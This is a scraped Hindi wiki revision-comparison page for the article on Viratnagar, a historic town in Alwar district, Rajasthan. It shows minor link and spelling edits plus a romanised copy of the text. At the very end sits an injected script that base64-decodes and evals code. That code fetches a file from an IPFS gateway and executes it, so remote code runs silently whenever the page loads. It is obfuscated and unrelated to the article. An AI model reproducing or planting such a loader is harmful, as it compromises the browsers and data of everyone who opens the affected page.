Difference between revisions of "विराट नगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:पौराणिक स्थान (को हटा दिया गया हैं।))
Line 1: Line 1:
*राजा विराट के ही नाम से विराट नगर [[राजस्थान]] प्रान्त के अलवर ज़िले का एक शहर है।  
+
*राजा [[विराट]] के ही नाम से विराट नगर [[राजस्थान]] प्रान्त के [[अलवर ज़िला|अलवर ज़िले]] का एक नगर है।  
 
*विराट नगर राजस्थान में उत्तर में स्थित है।  
 
*विराट नगर राजस्थान में उत्तर में स्थित है।  
 
*यह नगरी प्राचीन [[मत्स्य]] राज की राजधानी रही है। राजस्थान की राजधानी [[जयपुर]] से क़रीब 120 कि.मी. की दूरी पर है।  
 
*यह नगरी प्राचीन [[मत्स्य]] राज की राजधानी रही है। राजस्थान की राजधानी [[जयपुर]] से क़रीब 120 कि.मी. की दूरी पर है।  
*विराट नगर अरावली की पहाडियो के मध्य में बसा है। विराट नगर से 90 किलोमीटर की दूरी पर जयपुर और 60 किलोमीटर पर अलवर, और 40 किलोमीटर पर शाहपुरा स्थित है।
+
*विराट नगर [[अरावली पर्वत श्रृंखला|अरावली की पहाड़ियों]] के मध्य में बसा है। विराट नगर से 90 किलोमीटर की दूरी पर जयपुर और 60 किलोमीटर पर [[अलवर]], और 40 किलोमीटर पर [[शाहपुरा]] स्थित है।
{{प्रचार}}
+
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 12: Line 12:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
{{महाभारत}}
+
{{महाभारत}}{{राजस्थान के ऐतिहासिक स्थान}}
{{राजस्थान के ऐतिहासिक स्थान}}
 
 
__INDEX__
 
__INDEX__
 
[[Category:इतिहास_कोश]][[Category:ऐतिहासिक_स्थल]][[Category:महाभारत]]
 
[[Category:इतिहास_कोश]][[Category:ऐतिहासिक_स्थल]][[Category:महाभारत]]

Revision as of 14:23, 3 October 2011

  • raja virat ke hi nam se virat nagar rajasthan prant ke alavar zile ka ek nagar hai.
  • virat nagar rajasthan mean uttar mean sthit hai.
  • yah nagari prachin matsy raj ki rajadhani rahi hai. rajasthan ki rajadhani jayapur se qarib 120 ki.mi. ki doori par hai.
  • virat nagar aravali ki paha diyoan ke madhy mean basa hai. virat nagar se 90 kilomitar ki doori par jayapur aur 60 kilomitar par alavar, aur 40 kilomitar par shahapura sthit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>